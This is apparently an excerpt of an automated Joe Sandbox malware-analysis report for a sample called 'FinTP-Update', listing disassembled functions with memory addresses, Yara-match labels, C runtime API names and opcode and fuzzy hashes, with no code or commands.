                                                                                                                              • Opcode ID: 672d5a6a102d9c6f2e4ab4917c4b4192c11964095447964a51fc792122134f08
                                                                                                                              • Instruction ID: 332f569cf270984f4dd322c5bb57f0cfaeea1c388c04f6671cc5559b74e9c6ac
                                                                                                                              • Opcode Fuzzy Hash: 672d5a6a102d9c6f2e4ab4917c4b4192c11964095447964a51fc792122134f08
                                                                                                                              • Instruction Fuzzy Hash: 3EA1EB71619E088FFF45EFB5EC98ADA3BA6F768302310892A910AC3170DB7CD545CB41
                                                                                                                              Function 0000017F38AEB000 Relevance: .8, Instructions: 783COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0cbf232277f3f15e01563b74e11d0eb1f3cf9f834ab0d91de43518fd2f9e5d70
                                                                                                                              • Instruction ID: 063996cff421bf7cdef8de8144f50910f1d03ccf127efae771cff4ae646a3ba1
                                                                                                                              • Opcode Fuzzy Hash: 0cbf232277f3f15e01563b74e11d0eb1f3cf9f834ab0d91de43518fd2f9e5d70
                                                                                                                              • Instruction Fuzzy Hash: 9262FB312286558FD31CCB1CC5B1B7AB7E1FB89340F44896DE28BCB692C639E945CB91
                                                                                                                              Function 0000017F38AEA690 Relevance: .8, Instructions: 761COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1aaa7745e0cdbdf1d33799742b41e3b5edfa25ed5a0a9f8fbdb68c74659c64a2
                                                                                                                              • Instruction ID: b4ccdb8c23fdf1f982f47d6520900b08b2516575b0b89303cac38a31a01b1f8b
                                                                                                                              • Opcode Fuzzy Hash: 1aaa7745e0cdbdf1d33799742b41e3b5edfa25ed5a0a9f8fbdb68c74659c64a2
                                                                                                                              • Instruction Fuzzy Hash: 2352ED312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE286CB692C639E545CB91
                                                                                                                              Function 0000017F38AD8EF8 Relevance: .3, Instructions: 331COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: 294dfd6aa0aa6b837bb9898b406ee4477f3fea319359bf64df43cdaf9f1db6e7
                                                                                                                              • Instruction ID: 667d2a328d55bcd3ea51b76af891840ce44e8bdf6970ed5e43d3fd32f999a114
                                                                                                                              • Opcode Fuzzy Hash: 294dfd6aa0aa6b837bb9898b406ee4477f3fea319359bf64df43cdaf9f1db6e7
                                                                                                                              • Instruction Fuzzy Hash: 69A1703065C6489BDBA8DF2898557ABB3E1F798300F154A3EA49FC3291DF35D842C752
                                                                                                                              Function 0000017F38AD8010 Relevance: .3, Instructions: 300COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 434d4a8427360045d5c929f28f5a91d04e36536a85536fc44d4786a0a909d9b4
                                                                                                                              • Instruction ID: 67ce7d14b87af02db0a6d42a080477a76c5dd06176d28eb26d3b59d63dd32eb5
                                                                                                                              • Opcode Fuzzy Hash: 434d4a8427360045d5c929f28f5a91d04e36536a85536fc44d4786a0a909d9b4
                                                                                                                              • Instruction Fuzzy Hash: 5FA1E631598A059FEB58DF2898927F632E4F788311F24457DD86FC61A6DA3CC447C760
                                                                                                                              Function 0000017F38AD9518 Relevance: .2, Instructions: 215COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: 95484853a15f39b81b646c52c2ce4170c09dac7f610f29dfd23768379481bbad
                                                                                                                              • Instruction ID: 26b7143034ad32cde76afc3841bfe273ce8744574a02b304133c9fb8c1360d1d
                                                                                                                              • Opcode Fuzzy Hash: 95484853a15f39b81b646c52c2ce4170c09dac7f610f29dfd23768379481bbad
                                                                                                                              • Instruction Fuzzy Hash: 20516E7061CB488FDB58DF2898956AAB7E5FB98300F11562EE49FC3291DB34C8428B52
                                                                                                                              Function 0000017F38AD9248 Relevance: .2, Instructions: 207COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: 42ee227e1953fbfa5f097feed544ccfdbdad686d543400aa03d0ac6143a1708b
                                                                                                                              • Instruction ID: 3bbf077d1b84a8e6e9501c30eb253df4a3c486df82ecc2feceb865e49c831386
                                                                                                                              • Opcode Fuzzy Hash: 42ee227e1953fbfa5f097feed544ccfdbdad686d543400aa03d0ac6143a1708b
                                                                                                                              • Instruction Fuzzy Hash: D651877065CB489BDB68DF28D85676B73E1F799300F11463EE45BC3292DE34D8028792
                                                                                                                              Function 0000017F38AD8D28 Relevance: .2, Instructions: 189COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: b0ea6594531dfd5656634bc22ad5808e9f5fde0c550515b0b4bcad82a75f0e5e
                                                                                                                              • Instruction ID: 9ee7a737faa61c2961c1ca64ac9200675a524b0f305018d9fb469ed732e13999
                                                                                                                              • Opcode Fuzzy Hash: b0ea6594531dfd5656634bc22ad5808e9f5fde0c550515b0b4bcad82a75f0e5e
                                                                                                                              • Instruction Fuzzy Hash: FA51A33065C7489BDB58DF28D85527BB3E5F799700F11493EA49BC3292EF34D8028A52
                                                                                                                              Function 00007FF7193C2A78 Relevance: .0, Instructions: 2COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7193c0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bfb72a34125f5e5569dbb9934361a19847b3b9246cd262d6199107ec10c44898
                                                                                                                              • Instruction ID: 38b42b0c954aca908b9d69de8b25f37c00ac997a3b2fed93780322f80956be75
                                                                                                                              • Opcode Fuzzy Hash: bfb72a34125f5e5569dbb9934361a19847b3b9246cd262d6199107ec10c44898
                                                                                                                              • Instruction Fuzzy Hash: 1DA0022792CC17E4E618AF00EC50034A330FB60728BC0043BC40E418609F3DE68EC321
                                                                                                                              Function 0000017F38AE428C Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 388111225-0
                                                                                                                              • Opcode ID: 323dc41a9de03e9a07740cca5f04e26595757132f8d49690a5ce8369054044f7
                                                                                                                              • Instruction ID: 8620539d26e9410de7d234bc6a2368844deb2f954ab8efa101b6c88c09d9b777
                                                                                                                              • Opcode Fuzzy Hash: 323dc41a9de03e9a07740cca5f04e26595757132f8d49690a5ce8369054044f7
                                                                                                                              • Instruction Fuzzy Hash: 3C31B67014DB056FEB147F5998623BB36A4FB45320F11066DE43AC72E3D668A902C2B5
                                                                                                                              Function 0000017F38AE5078 Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2644381645-0
                                                                                                                              • Opcode ID: 873b0d2c7b9f2a9a16f39ad5e59c34a8817b3d38f7eb35014df5a93caa4f27f0
                                                                                                                              • Instruction ID: 0544104608f257fae48f905a2b796f3b2747db505ab08d4b21cf224143993c6c
                                                                                                                              • Opcode Fuzzy Hash: 873b0d2c7b9f2a9a16f39ad5e59c34a8817b3d38f7eb35014df5a93caa4f27f0
                                                                                                                              • Instruction Fuzzy Hash: 6921913168C6006EEA157B58E8623EB72E0FB45321F150A6DE53AC72D3D6686803C275
                                                                                                                              Function 0000017F38AE4F00 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1078912150-0
                                                                                                                              • Opcode ID: 280e0143ead6c036497839425e52de12061d2d247fceb6f41b8dcf2f589eb25e
                                                                                                                              • Instruction ID: f4eded753bd7ab41883f5540301b9ed9d4a4d63ed33a1b39a41f0ae7f2b33e7b
                                                                                                                              • Opcode Fuzzy Hash: 280e0143ead6c036497839425e52de12061d2d247fceb6f41b8dcf2f589eb25e
                                                                                                                              • Instruction Fuzzy Hash: FD21E430A8D6002EFB147B1898623FB72E4FB46B21F15062CE57AC72D3D6A86903C275
                                                                                                                              Function 0000017F38AE38A4 Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2464146582-0
                                                                                                                              • Opcode ID: a8a9024e62474796771646814a9e5a2ca8f6e4451e6db709f5688e106597b558
                                                                                                                              • Instruction ID: b6065dd19860281b3d4048e9ab46a6a71ea7d8c8974e48d3a05bf51cd06eaea9
                                                                                                                              • Opcode Fuzzy Hash: a8a9024e62474796771646814a9e5a2ca8f6e4451e6db709f5688e106597b558
                                                                                                                              • Instruction Fuzzy Hash: E321D23064DA002FEB147B1898623FB72A0FB85321F151A6CE07EC72D3D7A86802C2B5
                                                                                                                              Function 0000017F38AE30C8 Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2140805544-0
                                                                                                                              • Opcode ID: 175d254b2b05942476d6f27158d0f688fb51b7cc75f477299453f145ceba8cc1
                                                                                                                              • Instruction ID: 6b02a90f5ead887c47825c77f776e21fdcca03d11ac09ec5b99f7f7d383ca3e2
                                                                                                                              • Opcode Fuzzy Hash: 175d254b2b05942476d6f27158d0f688fb51b7cc75f477299453f145ceba8cc1
                                                                                                                              • Instruction Fuzzy Hash: 8121C23158D6006EEF147B5998613EB75A0FB81311F15197CA03E8B2D2C678A802C275
                                                                                                                              Function 0000017F38ADD644 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: free$_errno
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2288870239-0
                                                                                                                              • Opcode ID: dc0a899bc1ae816d0f478f744db04f352271d4723abe4b3d28e0244b960c08af
                                                                                                                              • Instruction ID: ce6c383f0c8f5663eed56bdeaead7d3f097760125e2c6e56d04699b8fcf5a837
                                                                                                                              • Opcode Fuzzy Hash: dc0a899bc1ae816d0f478f744db04f352271d4723abe4b3d28e0244b960c08af
                                                                                                                              • Instruction Fuzzy Hash: C14140302ACA09AFFF99EB58D8A57E672F1F758315F90406C911EC2291CA2C994AC730
                                                                                                                              Function 0000017F38AED160 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1812809483-0
                                                                                                                              • Opcode ID: 608ddb0ebf58fc55e8367f843a3238e699fba26a574d43cdd32437471f4c2c62
                                                                                                                              • Instruction ID: 2d15e46716aadc22c46387915016d233e7ae15da49a58598dc2e689521cb2ef9
                                                                                                                              • Opcode Fuzzy Hash: 608ddb0ebf58fc55e8367f843a3238e699fba26a574d43cdd32437471f4c2c62
                                                                                                                              • Instruction Fuzzy Hash: C651CF3055CA1A5BEF64BB1C84513E772F0FB54322F540A7EA479C72D5E62CE843C661
                                                                                                                              Function 0000017F38ABD64C Relevance: 11.6, APIs: 9, Instructions: 305COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: free$malloc$_errno$_callnewh
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4160633307-0
                                                                                                                              • Opcode ID: f552a11cc2a046eb70d10a3c163ab38b188ef03287f95d7eefe5a10727c8f2e8
                                                                                                                              • Instruction ID: 815254f1f13f53ec964f7f15a304d993bbb1667356bfbb77881e955e1bcc2e00
                                                                                                                              • Opcode Fuzzy Hash: f552a11cc2a046eb70d10a3c163ab38b188ef03287f95d7eefe5a10727c8f2e8
                                                                                                                              • Instruction Fuzzy Hash: 8491973035CB495BEB59AA6C94517FB72E1FB85700F54027DD89FC3282DE28D807C6A6
                                                                                                                              Function 0000017F38ADD4E8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2917016420-0
                                                                                                                              • Opcode ID: e3a06ccb74e207468ad288c0b1496e28f57cde2d7b1633ef596cad39198d99d1
                                                                                                                              • Instruction ID: 18b45fbaf8178e64d294c920e31c5866a2f3b13ef2f336ab595b842837b23eba
                                                                                                                              • Opcode Fuzzy Hash: e3a06ccb74e207468ad288c0b1496e28f57cde2d7b1633ef596cad39198d99d1
                                                                                                                              • Instruction Fuzzy Hash: 5931D530648A099FEF58AB6894253EB76E1FB88315F14457DA45FC32D1DA3CC846C761
                                                                                                                              Function 0000017F38ADF660 Relevance: 10.6, APIs: 7, Instructions: 86COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno$_callnewh_getptd_noexitfreemalloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2305145140-0
                                                                                                                              • Opcode ID: b8eef5b058aacb5c7b0b2ac6d2c62ebf4dabf01a1a5236c8a0a65fbda40956f8
                                                                                                                              • Instruction ID: 2a1b01ccd6e44376185d3a7b979449330a8c39276d28e0003fff4059b89b9ab0
                                                                                                                              • Opcode Fuzzy Hash: b8eef5b058aacb5c7b0b2ac6d2c62ebf4dabf01a1a5236c8a0a65fbda40956f8
                                                                                                                              • Instruction Fuzzy Hash: 0D218130658A496BFF64BB7844793AB31E1FB98351F40553DA82BC66E6DD2C884AC231
                                                                                                                              Function 0000017F38AE7B4C Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4120058822-0
                                                                                                                              • Opcode ID: 82da87704fa880fd8b77cf69d77c7cff71d342759e093c953a4bfec0af5346de
                                                                                                                              • Instruction ID: 059580339ec8e594557aca95927c3f0d3385a003929e339df7af60aba27714a1
                                                                                                                              • Opcode Fuzzy Hash: 82da87704fa880fd8b77cf69d77c7cff71d342759e093c953a4bfec0af5346de
                                                                                                                              • Instruction Fuzzy Hash: 7B21BD3068C6406EEA157B6898A63FB76A4FB84312F15093CE52FCB3D2C66C6842C375
                                                                                                                              Function 0000017F38ADE060 Relevance: 9.3, APIs: 6, Instructions: 257COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2328795619-0
                                                                                                                              • Opcode ID: 83566fdb18e0652497063575d9d94c2bcca9dd5beaa9381c9c4be5900da3fc8c
                                                                                                                              • Instruction ID: d6903002ba377ffdf2a08024ba4ee70d9a734203e37ac15fe4df54c134943bef
                                                                                                                              • Opcode Fuzzy Hash: 83566fdb18e0652497063575d9d94c2bcca9dd5beaa9381c9c4be5900da3fc8c
                                                                                                                              • Instruction Fuzzy Hash: 5B61B33029CF095AEF68672C48652BA72E1F7A4720F14033DE47BC32D5DA689867C1F1
                                                                                                                              Function 0000017F38AECFE0 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2808835054-0
                                                                                                                              • Opcode ID: 22084199dcef457752366679f24a9ac8e0ffb480946dbc81ec7667874f789c38
                                                                                                                              • Instruction ID: e48c561a980393ffc7e3e3ced659b85fbebd4fa125516e21e73e08a30e742b6a
                                                                                                                              • Opcode Fuzzy Hash: 22084199dcef457752366679f24a9ac8e0ffb480946dbc81ec7667874f789c38
                                                                                                                              • Instruction Fuzzy Hash: 9A316C3055CB089FDB54AB1C9080BAA76F0FB98310F1506ADA46EC73D6DA78E842C7A5
                                                                                                                              Function 0000017F38ADDCF8 Relevance: 9.1, APIs: 6, Instructions: 94COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1547050394-0
                                                                                                                              • Opcode ID: 03464c4b1d2ae17e45fb5954a9493ca0a1546f97a93f957a127c28b73ccc2abd
                                                                                                                              • Instruction ID: 75cb1ffd8bd6ba1f3994268b82dab32394d0a0e9bc8ba9fc920e596c79a4e2e5
                                                                                                                              • Opcode Fuzzy Hash: 03464c4b1d2ae17e45fb5954a9493ca0a1546f97a93f957a127c28b73ccc2abd
                                                                                                                              • Instruction Fuzzy Hash: 0A21A37065CA49AFFB94BB3848113AB76F1FB88350F04097D946EC3292DA68DC478375
                                                                                                                              Function 0000017F38ACE7E4 Relevance: 9.0, APIs: 7, Instructions: 264stringCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: freemallocstrchr$_errnorand
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2126518082-0
                                                                                                                              • Opcode ID: b52e64cb19c6ef7c24274209bcff20cffb849409e9a9608507de4d5f45a498cc
                                                                                                                              • Instruction ID: bcb53c394e743681e642231d0c74293f615a066e54657d7df110c437eaf17543
                                                                                                                              • Opcode Fuzzy Hash: b52e64cb19c6ef7c24274209bcff20cffb849409e9a9608507de4d5f45a498cc
                                                                                                                              • Instruction Fuzzy Hash: 7981A23065CE986AEFA9AB2CC4113E7B3F1FF99305F40417D959EC7292DA288947C361
                                                                                                                              Function 0000017F38ABD1B0 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: free$_errno$_callnewhmalloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2761444284-0
                                                                                                                              • Opcode ID: b5279776314d1a568a5a9843579be63428f20587529a23663c960782d212b0e1
                                                                                                                              • Instruction ID: 0ec75eab20adcbc9f674f4cf42c8806d6b00bc61368d308c2f9fbc62cbc31de3
                                                                                                                              • Opcode Fuzzy Hash: b5279776314d1a568a5a9843579be63428f20587529a23663c960782d212b0e1
                                                                                                                              • Instruction Fuzzy Hash: 4551C23025CF4A6BEB5AEA6894512FB72E4FB49304F50413DD95FC3287EA28E843C694
                                                                                                                              Function 0000017F38ACC5BC Relevance: 7.7, APIs: 5, Instructions: 205COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
